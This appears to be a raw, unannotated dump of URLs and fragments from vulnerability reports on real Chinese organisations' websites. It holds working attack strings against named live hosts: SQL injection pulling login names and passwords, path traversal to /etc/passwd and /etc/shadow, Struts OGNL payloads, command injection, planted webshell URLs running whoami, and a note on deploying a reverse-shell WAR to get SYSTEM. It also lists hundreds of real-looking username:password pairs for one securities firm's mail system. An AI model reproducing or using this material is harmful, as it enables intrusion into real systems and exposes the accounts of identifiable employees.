XSS:http://**.**.**.**/index.php http://dujia.lvmama.com:80/trip/destPaginationOfTrip?currentPage=1&destId=3727,3729,3543&elite=1&categoryCode=category_route_group http://idm2.tcl.com:8088/jsp/index.jsp http://**.**.**.**/bugs/wooyun-2010-082455 file:///D:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties http://**.**.**.** http://**.**.**.**/news.php?category=41 http://**.**.**.**/news_detail.php?newsId=5232 http://**.**.**.**/news_detail.php?newsId=5231 http://**.**.**.**/news_detail.php?newsId=5229 
http://**.**.**.**/news_detail.php?newsId=5227 http://eyou.huatu.com/ http://**.**.**.**/ui/logon/InitUserSave.jsp http://**.**.**.**/ui/logon/InitUserSave.jsp http://**.**.**.**/ui/logon/main.jsp http://tiyu.nchu.edu.cn/bigclass.asp?id=3 inurl:http://gopurchase.haier.com/GOPurchase/page/Base/ http://gopurchase.haier.com/Gopurchase/page/Base/LSupplyerIntroduceAppraisal/LSupplyerRegist/LSupplyerRegistInfo.aspx?state=2&userNo=hexinjixie http://gopurchase.haier.com/GOPurchase/page/Base/LSupplyerIntroduceAppraisal/LSupplyerRegist/LSupplyerRegistInfo.aspx?state=2&userNo=bogesi http://gopurchase.haier.com/GOPurchase/page/Base/LSupplyerIntroduceAppraisal/LSupplyerRegist/LSupplyerRegistInfo.aspx?state=2&userNo=bogesi http://111.13.100.253/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd http://learning.ufh.com.cn/login.do http://career.ruc.edu.cn http://rd.haierpeople.cn/ http://**.**.**.**/solr/#/ http://**.**.**.**/search.zip http://**.**.**.** http://**.**.**.**:3000/ http://**.**.**.**:3000/AffairsPublic/list.aspx?cid=33&cityid=4412 http://**.**.**.**/comp/110/?title=1 http://**.**.**.**/ http://**.**.**.**/ http://219.217.226.139/ http://219.217.226.139/console http://**.**.**.**/service/message/list?typeId=9 http://**.**.**.**/admin/index.php?m=public&a=login http://api.super8.com.cn:8081/ http://oa.cpi.jx.cn/yyoa/index.jsp http://**.**.**.**/web.rar http://**.**.**.**/1.zip http://**.**.**.**/1.zip http://**.**.**.**/1.zip http://**.**.**.**/1.rar http://**.**.**.**/www.rar http://**.**.**.**/web.rar http://**.**.**.**/1.rar http://**.**.**.**/1.rar http://**.**.**.**/web.zip http://**.**.**.**/1.rar http://**.**.**.**/web.rar http://**.**.**.**/1.rar http://**.**.**.**/1.rar http://**.**.**.**/1.zip http://**.**.**.**/wangzhan.rar http://**.**.**.**/123.zip http://**.**.**.**/root.rar http://**.**.**.**/data.rar http://**.**.**.**/web.zip http://**.**.**.**/1.rar http://**.**.**.**/mdb.rar http://**.**.**.**/mdb.rar 
http://**.**.**.**/123.zip http://**.**.**.**/web.zip http://**.**.**.**/root.rar http://**.**.**.**/1.rar http://**.**.**.**/web.zip http://**.**.**.**/123.zip http://**.**.**.**/www.zip http://**.**.**.**/1.zip http://home2014.xizi.com weixin:printer jdbc:mysql**.**.**.**/waawo?characterEncoding=utf8&zeroDateTimeBehavior=convertToNull http://acadol.hnu.edu.cn http://acadol.hnu.edu.cn www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8100.talk99.cn/monitor%2Cp0%3Ahttp%253A//acadol.hnu.edu.cn/Hunan/university/news/list.do http://**.**.**.**/search.aspx?key= http://**.**.**.**/search.aspx?key= http://**.**.**.**:8090/files/ http://mail2.glsc.com.cn:8093/stcenter.nsf http://mail2.glsc.com.cn:8084/names.nsf/$users ShenZ:148501 bwang:123456 caiyl:caiyl8 caol:1qaz2wsx chaixm2:888888 chenaw:chenaw chenb:168168 chench:999999 chenghl1:112358 chenkp:888888 chenl1:888888 chenmeng:chenmeng chenq1:888888 chensx:123456 chentl:888888 chenww2:117225 chenwz:654321 chenxf:123456 chenxuey:191928 chenym:chenym chenyu:147258 chenzy:chenzy888 chult:196671 chuxy:110119 chxj:ccccc cuimm:135616 daizhen:168168 dengmy2:888888 dingying:999999 dingyj:123123 emonitor1:123456 emonitor2:123456 fanjw:130139 fanyh:8899 fenghj:123456 fengk:123456 fengkj:888 fuwutai:Abcd1234 gaojy2:888888 genghr:198891 gengsf:176537 gengzc:password gloud2:123123 gloud3:123123 glqhyf1:123456 gucq:888888 guoh:999999 guoy:110119 gxzjj:gxzjj houj:gl123 houwr:124425 houyt:999999 huawr1:abc123 huawr2:102501 huawr:102501 huiy:142857 huoyq:123456 huyangl:888888 info-glcmc:194806 jial:123456 jiangaz2:888888 jiangjm:shandan jiangl:999999 jianglj:123123 jiangq:Asdf1234 jiangs:abcd1234 jiaoxp:666666 jil:654321 lianghf:102921 libo:abcd1234 lic:tracy1 lichenjie:135246 lij2:888888 liliang:198610 limd:123456789 linfy:linfy liuhuan:liuhuan2 liuhx:168000 liupf:140630 liusr:123qwe lixinr:123123 liyj:107108 liyue:liyue888 
lizh:lizh8888 lizhen:199175 lubin:888888 lucx:abc123 lujn:199115 lujw:153201 lumin:a123456 lumj:888888 luqx:123456 lus:000000 luyq:888888 luzk:abcd1234 lvzl:130133 maty1:123123 meix:888888 nil:19740124 niy:101010 panbb:12345 panq:abcd1234 panyj:123123 pengyb:pengyb123 qiank:888888 qszy:123456 quey:quey1962 renzx:renzx123456 shanxy1:888888 shaolin:198900 shaoxq:666666 shaoyl:hello shaql:139120 shenc:sc1106 sheng:171717 shenjie:121212 shenlj:198712 shenyg:123123 shenzy:123123 sunbin:123456 sunmx:888888 suw:110110 szkf:888888 tangj:666666 tangzh:abcd1234 taocl:taocl taomy:888888 tongbz:888888 wangbing:133976 wangchunxiang:111111 wangcong:wangcong wangfj:888888 wangj1:wangj wangjie:a123456 wangk:888888 wangq:wangq wangquan:wq111 wangqx:121800 wangsy:000000 wangt:password wangxinyi:wangxinyi& wangxm:123abc wangxy2:888888 wangy2:888888 wangye:abcd1234 wchao:abcde wj:12345678 wll:101089 wuting:wuting1989 wuxj:abcd1234 wuxq:888 wxj:wxj888 xiaow1:180783 xiat:198706 xiefang:123654 xinc2:888888 xuc:111111 xuej:111111 xuexl1:888888 xuezy:888888 xufl:123789 xug:xug123456 xujie:888888 xuke:xuke1990 xumx:zxcvbnm xumz:654321 xuwb1:888888 xuyd1:888888 yangj1:yangj yangjie:12173 yangro:123321 yangrq:198474 yangyj:198789 yanhm:similar yingxw:aaaaa yuanlj:888888 yubin:123456 yud:999999 yuj:147258 yury1:yury yutq:11111 yuziyue:yuziyue1993 yyue:888888 zhangcy:zhangcy zhanghao:888888 zhangjf:888888 zhangjie:444444 zhangjunl:123123 zhangn:123123 zhangw1:147369 zhangxc:198511 zhangxin:0123456 zhangym:888888 zhangyu:198308 zhangyunyx:888888 zhangzj:abcd1234 zhaojiong:132153 zhaoy:legend zhongtai:zhongtai123 zhongwy:198468 zhoujj:a123456 zhoulian:777777 zhoupq1:zhoupq zhouqin:114123 zhouwh:abcd1234 zhouwp:888888 zhouxb:zhouxb zhubc:181818 zhuc2:888888 zhucx1:abc123 zhutt:zhutt zhuxl:888888 zhuzn:zhuzn123456 zouhz:888888 zouj:5104 zqian:888888 http://newoa.glsc.com.cn:8082/ http://bbs2.glsc.com.cn:8088/glscbbs/ http://help.glsc.com.cn http://learning.ufh.com.cn 
http://learning.ufh.com.cn/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../../ http://**.**.**.** http://master.duomai.com/index.php?a=slist&category_id=36&m=scoremall&order=date http://www2.sdu.edu.cn www2.sdu.edu.cn http://**.**.**.**/c6 http://**.**.**.**/c6/jhsoft.web.login/GetPassWord.aspx?flag=getEmail&UserName=admin http://clbz.scu.edu.cn/打不开) http://clbz.scu.edu.cn:8080/com.wisesoft.cdreg.web/vehicleregistration/getCheckByList.html http://clbz.scu.edu.cn:8080/com.wisesoft.platform.web/cdreg/login/welcome.html(系统1) http://clbz.scu.edu.cn:8080/com.wisesoft.cdreg.web(系统2) http://clbz.scu.edu.cn:8080/com.wisesoft.cdreg.web/vehicleregistration/toList.html http://clbz.scu.edu.cn:8080/fileuploads/chopper.jsp jdbc:oracle:thin:@127.0.0.1:1521:orcl jdbc:postgresql://192.168.9.2:5432/ipms https://**.**.**.**/i-trade/ http://mail.jnu.edu.cn http://passport.wanglibao.com/ http://211.151.235.90/etc/passwd http://pgzx.nchu.edu.cn https://vpn.fjmu.edu.cn/web/1/http/0/www.fjmu.edu.cn/s/49/t/311/28/96/info10390.htm http://**.**.**.**/announce/outside/content.asp?DOCID=609&HISTORY=-1 http://**.**.**.**/cms/templet_pro.do http://**.**.**.**/cms/images.jsp http://**.**.**.** http://**.**.**.**/shows.aspx?id=85&ids=1299 http://**.**.**.**/admin/Login.aspx http://**.**.**.**/jiuzhen/index.php?id=19 http://life.ufh.com.cn/guidelist.php?g_id=11 http://**.**.**.**/ http://**.**.**.**/login/Login.jsp http://jxjy.nchu.edu.cn/checkuser.asp?email_ACT=-1 http://**.**.**.**/bugs/wooyun-2010-0149415 http://114.112.92.106/.svn/entries http://114.112.92.106/index.html http://219.143.162.218/htwx/indexlis.jsp http://219.143.162.218/htwx/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=42 http://vendor.xiu.com/login.action http://www.haibao.com/index.php?c=Survery&a=Survery&id=17'%20and%201%3d2%20and%20'a'%3d'a&tplid=3 
http://**.**.**.**/myscm/.svn/entries http://**.**.**.** bid.foxconn.com.cn/bidvendor/bidweb/data/Database.mdb http://bid.foxconn.com.cn/bidvendor/bidweb/login.asp https://mail.xdf.cn ftp://**.**.**/ http://**.**.** https://vpn.xdf.cn http://400.xdf.cn/knowledge/index.jhtm?providerNo=3001&articleId=229 https://gate.staff.xdf.cn https://gate.staff.xdf.cn, http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourceManager http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://xd.chanhen.com/messager/users.data http://www.chanhen.com:801/messager/users.data http://ecis.chanhen.com:89 http://www.chanhen.com:801/tools/SWFUpload/upload.jsp http://www.chanhen.com:801/nullwoo.jsp http://oa.riit.tsinghua.edu.cn/yyoa/index.jsp http://www2.chanhen.com/publicjob.asp?id=2 http://www2.chanhen.com/publicjob.asp?id=2 http://**.**.**.**/index.action?request_locale=zh_TW http://**.**.**.**/index.action?request_locale=en_US http://**.**.**.**/index.action?request_locale=zh_TW http://**.**.**.**/index.action?request_locale=zh_TW http://www.epm.neu.edu.cn/wangqiang/en/News_search.asp?bid=1&pageno=2 http://m.cofcopack.com:8080/Campus.aspx http://115.29.202.192:8081/console https://github.com/JohnZhangJava https://github.com/JohnZhangJava/MyWorkSpace/blob/e05a950c91b34641de3361b47c83282e8ff80571/project/p2p/p2p_v1_3_1_server/.svn/pristine/b3/b39b184350c6c3179a3bce753c5e16182ba0029a.svn-base 
jdbc:mysql://10.210.51.***:3306/cms_sxxh?useUnicode=true&characterEncoding=utf-8 http://**.**.**.**:7007/console/login/LoginForm.jsp http://**.**.**.**/,如图所示: http://**.**.**.**:8088/,OA系统,如图所示: http://**.**.**.**:8088/ http://jk.gtcloud.cn/portal/login_init.action http://**.**.**.**/login.do http://sy.tiku.huatu.com http://www.chanhen.com:801/ http://www.chanhen.com:801//page/maint/login/Page.jsp?templateId=18 http://mrtg.neu.edu.cn/cacti/graph.php?action=properties&graph_end=1449299263&graph_start=1449212863&local_graph_id=1130&rra_id=0&view_type=tree http://**.**.**.**/ http://**.**.**.** http://115.29.202.192:9001 http://sns.tgbus.com/pspdatareader/down.aspx?gid=c02bc722-74d7-4f7c-82eb-6684af7bdefb redirect:http://**.**.**.**/ http://**.**.**.** http://221.8.57.106:7009/console/login/LoginForm.jsp http://authors.cnhubei.com/login.html http://authors.cnhubei.com/ashx/Service.ashx?method=GetOnLineUser http://chat.zohi.tv/livechat/ http://chat.zohi.tv/livechat/login.jspa?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://**.**.**.** http://218.78.217.82:2012/newInsuranceQxx/ http://fan.ip66.com/ http://re.ip66.com/ http://boss.exmail.qq.com/index.html http://plus.zealer.com/user/sendMessage http://plus.zealer.com/sendPost/post http://plus.zealer.com/user/userUpdate?name=&email=&password=&resetpwd= 
http://www.ch.com/春秋航空的,扫其C段发现存在漏洞的机器 http://**.**.**.**:8080/admin/ http://**.**.**.** http://**.**.**.**:8000/admin/login.jsp http://**.**.**.**/ac_showArticle.action?article_id=663 https://github.com/jerryhjy/anjuke/tree/master/docs https://github.com/jerryhjy/anjuke/blob/785ebfe120c9e81fe57914f5f19ac266edb548fb/docs/BizDesc/Member/%E7%94%A8%E6%88%B7%E4%B8%AD%E5%BF%83%E6%A6%82%E8%BF%B0.md https://github.com/jerryhjy/anjuke/blob/master/docs/API/%E5%85%B6%E4%BB%96%E5%B0%8F%E7%B3%BB%E7%BB%9F/%E4%BE%9B%E5%BA%94%E5%95%86%E6%B8%A0%E9%81%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/README.md http://m.zzz4.com/pk/info.php?id=1 http://**.**.**.**/pinggu/result.aspx?id=1051 http://218.78.217.82:8094 www.damailicai.com)是长城证券战略投资的互联网理财平台,专注于上市公司供应链融资业务,已完成B轮融资,是P2P行业少数几家已经获得B轮风投的P2P平台。(官网介绍) http://**.**.**.**/save.asp?id= http://111.204.108.33 http://teach.gaosiedu.com/wwwroot.tar http://**.**.**.**/IRenderService/CreateChart http://202.108.103.191:8080/wfWeb http://202.108.103.191:8080/BizCoreWS/ http://202.108.103.191:8080/BizCoreWS/axis2-admin/ http://221.239.62.23:9080/sis/indexlis.jsp http://221.239.62.23:9080/sis/common/cvar/CExec.jsp http://www.shouhuobao.com/merchant/index.html http://msg.shouhuobao.com:9090/ http://iepi.neu.edu.cn http://**.**.**.**:7002/ http://221.239.62.23:9080/sis/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://221.239.62.23:9080/sis/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://lib.htfutures.com/ http://lib.htfutures.com/ld_notice.php?Nid=16 http://mail.228.com.cn/ http://**.**.**.**/sq/common/download?s=C08010000_A001_shequ_908010000&t=2 http://**.**.**.**:235/dylgy/Login.aspx http://webchat.cpic.com.cn:8183/webstat存在SSRF漏洞,可探测内网主机开放端口。 http://**.**.**.**/features.php?KindID=10&ID=216 http://**.**.**.**/admin/index.php http://202.108.103.191:8081/reins http://mail.huatu.com http://**.**.**.**/festival.php?id= http://**.**.**.**/forumtext.php?forum_id=1498 https://vpn.wanda.cn http://**.**.**.**/www.zip 
http://www.bookasia.cn/Login/index?out=1 http://**.**.**.**/designinfo.php?id=-1 http://180.149.144.31:8091//getpoidetail.php?bid=;%20pwd;%20/sbin/ifconfig;%20whoami;%20curl%20baidu.com;hostname encap:Ethernet F3:FC:4A:BA:CE addr:10.95.16.37 Bcast:10.95.16.127 Mask:255.255.255.128 MTU:1500 packets:90981233561 dropped:59842 packets:69326320680 txqueuelen:1000 http://**.**.**.**/ http://**.**.**.**/admin.php http://219.217.226.139/ http://zyxw.dlmu.edu.cn:8080/ZYXWMPA/login/login_logout.do http://mock.wenwen.sogou.com/org/index.do http://**.**.**.**/admin/main.php http://ais-pr.sleb.cn/ter/ http://ais-pr.sleb.cn/ter/common/cvar/CExec.jsp http://114.80.121.109:8080/ http://www.guagua.cn/ http://order.guagua.cn/buyRoom!default.jspa http://order.guagua.cn/buyRoom.jspa?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**.**/ http://**.**.**.**/class/gr_add.asp?id=2526 http://bolt.xunlei.com/bbs/forum.php http://xlue.xunlei.com/bbs/config/config_ucenter.php http://zs1.zzz4.com/ToHtml/Html_New.asp?d=2015-10-9&id=1&lx=news http://datong.china51766.com JHSoft.WCF/POSTServiceForAndroid.svc/LoginNew http://www.tosot.com.cn/ http://www.tosot.com.cn/about.php?id=1&op=1 http://www.tosot.com.cn/administrator/default.php http://1hz.gree.com/ http://1hz.gree.com http://www.qzyy.net.cn www.qzyy.net.cn http://bao.jd.com/vehicle/trade http://bao.jd.com/vehicle/ http://office.chder.com/yyoa/index.jsp admin.php/Public/checkLogin http://b2b.haier.com http://**.**.**.**/Login.aspx http://**.**.**.**/Loginout.aspx?mac=86F4963E7991F0F8 http://qr.hisense.com/ http://**.**.**.**:8080/ 
http://**.**.**.**/admin/login.asp http://youxue.xdf.cn/whitecollar/Account/CheckLegalUserName?UserName=admin http://youxue.xdf.cn/whitecollar/Account/CheckLegalUserName?UserName=admin%27%20and%20%271%27like%20%271 http://dev.mumayi.com/index/city?pid=2 https://**.**.**.**/junehappylove/myjwy/blob/bb0b9c7a63cfba5a26ad6f2ace2ed3af993221b6/src/mail.properties http://sfocs-i.sf-express.com/SFweb/handler.action http://**.**.**.**:8080/dataPass/login.action http://**.**.**.**:7001/index.shtml存在java反序列化漏洞 http://www.dfrobot.com.cn www.dfrobot.com.cn http://218.58.70.237:8080/css/login/login.html www.shbeidou.com http://222.73.45.249/invoker/JMXInvokerServlet存在java反序列化漏洞 http://sttc.sh.tobacco.com.cn JHSoft.WCF/POSTServiceForAndroid.svc/LoginNew http://**.**.**.**/neiye.php?id=102 http://**.**.**.**/admin/login.php并进入。 http://www.dfmg.com.cn:8008/scn/news.jsp?id=1 http://www.dfmg.com.cn:8008/tcn/news.jsp?id=1508 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/master/Login.asp http://oa.htfutures.com/login/login.jsp http://oa.htfutures.com/messager/users.data http://**.**.**.**/ http://**.**.**.**/admin/upload.aspx http://**.**.**.**/ http://**.**.**.**/plSearchByDoctor.aspx?Doctor= http://**.**.**.**/plSearchHospital2.aspx?ID=2027 http://**.**.**.**/plSearchList.aspx?TYPE=DEPT&ID=%27%20or%20%271%27=%271 http://**.**.**.**/zkDoctorList.aspx?Type= http://**.**.**.**/zkZiXun.aspx?ID=ZK00000019 http://**.**.**.**/zkYuYue.aspx?HOSPITALID=ZK00000019 http://alwayson.hp.com.cn/ http://alwayson.hp.com.cn/aas/ http://alwayson.hp.com.cn/aas/y.aspx http://hzqxjycom.cw113.bizcn.com/cms/Login.aspx http://180.76.16.101 http://**.**.**.**/ index.php/Public/checkLogin/ http://share.yadea.com.cn port:8787 http://218.57.112.198:9000 http://service.zol.com.cn/survey_new/submit_vote.php http://easyryt.com/default/images/sk15.txt http://**.**.**.**/htgl/top.asp http://**.**.**.**/admin/top.asp http://**.**.**.**/gbook/?18_1.html http://**.**.**.**/db http://**.**.**.**/images/_notes 
http://**.**.**.**/aspnet_client/system_web http://**.**.**.**/db.rar直接下载 http://**.**.**.**/aspnet_client http://idke.ruc.edu.cn http://cemftp.ce-air.com/yyoa/index.jsp http://www.1hai.cn/c/orderlogin.aspx?url=step5.aspx%3faction%3d2 http://**.**.**.**/ADMIN/ http://**.**.**.**/ADMIN/sd_theme.asp?act=edit&filename=../version.asp http://**.**.**.**/Web_sc/login.gn http://speed.tgbus.com/tgdb/car/202.shtml tomcat:tomcat进入。直接上传reverse.war包。回弹administrator权限,直接提权至system权限。 http://**.**.**.**/products/products_list.php?offset=0&cid=233*&sort=p.proNo http://59.151.39.93:7002 http://59.151.39.93:7002/shell/shell.jsp?cmd=whoami http://59.151.39.93:7002/manager/index.jsp http://112.65.254.133:8080/invoker/JMXInvokerServlet http://**.**.**.**/cart.php?Action=add_item&pid=45*&qty=1 http://**.**.**.**/news.php?tid=9* http://**.**.**.**/ncu7060/cp_right.php?pno=863 http://**.**.**.**/ncu7060/cp_right.php?pno=922 http://*.*.*.*:8080/invoker/JMXInvokerServlet http://crm.fabpo.com:8000/develop/systparam/softlogo/file2.jsp http://mail.fabpo.com/ http://www.rqzhzh.net/admin.php http://hz.cofcopack.com/ http://hz.cofcopack.com/client.do?method=getpage&sessionkey=abcnez-_N4wQ25akB2bgv&module=6&scope=3&detailid=3 http://211.150.74.101:7001/ http://**.**.**.**:8000/ http://online.3g.ifeng.com/live/manager/ifeng_match_live.php?&match=7192 http://online.3g.ifeng.com http://rom.lidroid.com/article?id=126&root=125 https://owa.corp.gome.com.cn http://**.**.**.**/ls_list_desc.php?cid=29&id=301 http://**.**.**.** http://wap.120ask.com/wap/logins http://**.**.**.**:8081 http://**.**.**/jhtml/index_ http://**.**.**/action/hdjl/addWZ2.actionwriteType=2&&wtid=43_ http://**.**.**.**/存在java反序列化命令执行漏洞漏洞,发现服务器被人留了webshell后门。。目标为: http://**.**.**.**/ahzxcms/web/zrmd.jsp?strJH=%CA%AE%D2%BB%BD%EC&strMemDuty=06%2c07&strSId=1421291498714299&type=05 site:oa.chinatowercom.cn site:project.chinatowercom.cn http://www.buywit.cn/index.php/help/clist/?key=-1 
http://m.sfn.cn/pcview.html?url=http://uimall.pflife.com.cn/online/business/partnerMap/findReviewPC.do?serialNo=8a838eaf4982df67014982f02c2e004f http://m.sfn.cn/admin/ http://www.zhihuishu.com/ http://wy.nenu.edu.cn/fckeditor/editor/filemanager/connectors/uploadtest.html,此处上传点通过%00截断文件夹路径可导致任意上传。 http://app.tgbus.com/correlate/data.ashx?t=load&callback=callback06490636034868658&source=tgbus&id=c1&channel=电玩&type=news&domain=0&top=6&imgwidth=63&imgheight=63 http://**.**.**.**/Search/Do/ http://www.edufe.com.cn/lcenter/lcenter.php?action=lcenter_award&year_v=-1 http://chexiang.1hai.cn/Login/ForgetPassword http://**.**.**.**/rhin_ehr/reviewLoginHa.action http://219.218.118.168:8089/ http://**.**.**.**/ AjaxService.svc/SiteVisiteNum http://**.**.**.**/AdminUser/UserForm/?admin_user_id=2 http://**.**.**.**/invoker/JMXInvokerServlet http://image.91bihu.com/images/2015/11/10/IDCard/ http://**.**.**.**/salary/studentls.php http://**.**.**.**/position/zp_index.php?id=5 www.muzhiwan.com http://www.muzhiwan.com http://shop.zzz4.com/hj/home/index.asp http://122.97.17.92,之前看了下曾被报过jboss漏洞,试试能不能跑出反序列化来 http://**.**.**.**/index.php?c=default&a=infoX&p=7&id=25 http://isub.snssdk.com/2/user/profile/v2/?user_id=174&iid=3334171937&device_id=8932146&ac=wifi&channel=app_download&aid=13&app_name=news_article&version_code=502&version_name=5.0.2&device_platform=android&abflag=5&ssmix=a&device_type=MI+2&os_api=16&os_version=4.1.1&uuid=867064013746720&openudid=df490e5c389f6304&manifest_version_code=502&resolution=720*1280&dpi=320 http://p1.pstatp.com/medium/2270/3792614991 http://121.15.167.239:9000/invoker/JMXInvokerServlet http://**.**.**.**/bugs/wooyun-2010-0132422 http://123.232.100.133:8080/ http://quan.zzz4.com/index.php?act=coupon&area_id=&city_id=2&class_id=&class_id_1=&mall_id=&op=list&orderby=1&sort=asc http://**.**.**.**/index.php?page=actinfo&id=799&cid=3eb7bcb448ebc01e12925e514be4617e67ee40df http://www.hexin99.com/ http://**.**.**.**/bugs/wooyun-2010-0125282 
http://**.**.**.**:8080/attachment/3028000338/error425278.php http://114.119.6.28/ http://114.119.6.41/ http://gyjj.tcl.com/gyjj.tcl.com.rar http://106.2.66.42/ http://219.128.102.212:8380/ebridge_galanz/security/index.jhtml http://www.scrcoabj.com/yyoa/index.jsp view-source:http://www.scrcoabj.com/yyoa/common/SelectPerson/reloadData.jsp http://www.scrcoabj.com/yyoa/checkWaitdo.jsp http://oa.sy-yy.com:8989/yyoa/index.jsp http://gykgah.com/yyoa/index.jsp http://61.163.78.6:8080/yyoa/index.jsp http://**.**.**.**/ http://www.huirenyy.com/ http://www.huirenyy.com:1234/login.action http://**.**.**.**/agent/login.php http://alumni.edaao.sysu.edu.cn/ https://github.com/fp2009/YSD/blob/4a9fe2325a0d4132da8e4c424347fc02608ebf8b/src/main/java/com/ysd/pro/common/utils/SendMailUtil.java http://android.myapp.com/myapp/detail.htm?apkName=com.blossom.rzc http://**.**.**.**/load.loadPage.d?page=chaxun_dg.xml&siteCode=xkjdpt http://**.**.**.**/hyxhweb/load.loadPage.d?page=dlxh_detail.xml&newsid=13502845&siteCode=dzfw&urlChannelId=1181&urlMenuId=1181 http://www.yongcheng.com/ http://**.**.**.**:8008/login/Login.jsp?logintype=1 http://**.**.**.**/bugs/wooyun-2010-076547 http://**.**.**.**:8004/login.do http://**.**.**.**:8003/ http://**.**.**.**/ http://**.**.**.**/restaurant_content.php?id=5 http://cis.xbwl.cn/login!init.action http://cis.xbwl.cn/www.jsp http://**.**.**.**/admin/Login.aspx http://tee.sports.sohu.com http://www.yasabake.com旁站存在注射 http://**.**.**.**/APC/Index.html http://**.**.**.** http://222.189.156.67:8089/yyoa/ www.xiaoyuan52.com http://www.xiaoyuan52.com/ http://www.chnpec.com/cpec_tran/index.php?action=translat-ShowLogin http://www.chnpec.com/cpec_zh/index.php?action=login-checklogin http://www.chnpec.com/cpec_international_zh/index.php?action=login-checklogin&rel=L2NwZWNfaW50ZXJuYXRpb25hbF96aC8= http://www.chnpec.com/cpec_international_en/index.php?action=login-checklogin&rel=L2NwZWNfaW50ZXJuYXRpb25hbF9lbi8= www.chnpec.com http://**.**.**.**/bhwebins/client/ 
encap:Ethernet B3:0B:44 feb3:b44/64 Scope:Link MTU:1500 packets:413976718 packets:467656991 txqueuelen:1000 http://**.**.**.**/public/detail.php?BookwareID=73855753 http://**.**.**.**/newweb/bookproduct.php?TypeID=1 http://**.**.**.**/newweb/course.php?TypeID=2 http://**.**.**.**/public/detail.php?BookwareID=73855753 http://**.**.**.**/newweb/bookproduct.php?TypeID=1 http://**.**.**.**/newweb/course.php?TypeID=2 http://123.127.251.8:7001/console/login/LoginForm.jsp jdbc:oracle:thin:@10.10.139.1:1521:finarp jdbc:oracle:thin:@10.10.134.23:1521:slistest http://**.**.**.**:16080/jmx-console/站点存在java反序列化漏洞,使用的是jboss http://new.edong.com/Host/Exclusive_Host.aspx?typeid=23&languageid=3&lineid=1 http://www.lionfund.com.cn/chatshow/flowNewQuetbean.jsp?localid=-1 http://**.**.**.**/hhsi/allusermanager.action?action=inPlatintruduction存在命令执行漏洞 http://finance.inewsweek.cn/baidu_siteapp_detail.php?id=70382 http://politics.inewsweek.cn/ipad_content.php?id=85168 http://hc.tgbus.com/ http://ygzs.shutcm.edu.cn/ http://ygzs.shutcm.edu.cn http://cis.xbwl.cn/vms/ http://cis.xbwl.cn/vms/login.do?dispatch=getUser&usercode=00000 http://cis.xbwl.cn/vms/login.do http://**.**.**.**:7001/etrading/ http://**.**.**.**:7001/console http://**.**.**.**:7001/spy/cmd.jsp?pwd=023&cmd=whoami http://**.**.**.**/sa/dls/dls04/dls04-3/newssig.asp?id=11 http://**.**.**.**:8081 http://219.143.202.137:8080/login.action http://219.143.202.137:8080/she11.jsp http://**.**.**.**/sexedu/b5/event/event_details.asp?evID=289 http://web20.kingdee.com/PushPlatform/user_login.action http://flight1.mangocity.com http://**.**.**.**/nweb/ http://www.sinopharmsx.com:9090/ http://**.**.**.**/cc2/courseview.asp?classnum=CC10326 http://180.169.5.238/amp/shell.jsp http://**.**.**.**:8016/company.aspx http://**.**.**.**:8016/upload/15129090751329.asp http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598 http://www.fft365.com/User/UpdateUserPwd.aspx?saveType=1&ismypwd= 
